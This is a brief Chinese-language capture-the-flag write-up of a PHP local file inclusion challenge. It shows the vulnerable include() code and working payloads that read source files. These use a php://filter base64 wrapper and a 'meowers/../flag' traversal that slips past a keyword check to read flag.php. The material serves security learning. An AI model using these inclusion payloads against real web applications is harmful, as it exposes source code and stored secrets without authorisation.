给了两个按钮,随便点一个url连接会变成:index.php?category=meowers这种形式。
很容易想到文件包含漏洞。尝试:
category=php://filter/read=convert.base64-encode/resource=index
默默说一下,这里把index.php换成index是因为后端给文件后拼接了“.php”
得到index.php的源码,我截取了重要的部分:
<?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ include ($file . '.php'); } else{ echo "Sorry, we currently only support woofers and meowers."; } } ?>
接下来包含flag.php文件:
?category=meowers/../flag
查看源代码,会多出这一行,说明已经成功包含到了:
<!-- Can you read this flag? -->
读取flag.php:
?category=php://filter/read=convert.base64-encode/resource=meowers/../flag